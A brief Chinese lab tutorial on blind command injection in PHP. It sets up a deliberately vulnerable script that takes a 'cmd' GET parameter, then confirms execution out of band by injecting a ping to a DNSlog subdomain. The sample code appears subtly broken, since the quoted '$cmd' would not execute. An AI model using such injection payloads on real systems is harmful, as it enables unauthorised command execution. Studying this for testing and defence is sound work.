环境搭建:
1.创建text.php文件
<?php
if(isset($_GET['cmd'])) {
$cmd=$_GET['cmd'];
'$cmd';
}else{
echo"?cmd=whoami";
}
?>
漏洞复现
1.执行命令执行
?cmd=whoami
没有回显
2.使用DNS绕过
- 请求一个临时域名
emkxoclycy.dgrh3.cn
- ping 生成的临时子域名
?cmd=ping myxsoruszt.dgrh3.cn
- 3.去Dnslog查看是否有回显。
有回显证明可以进行命令执行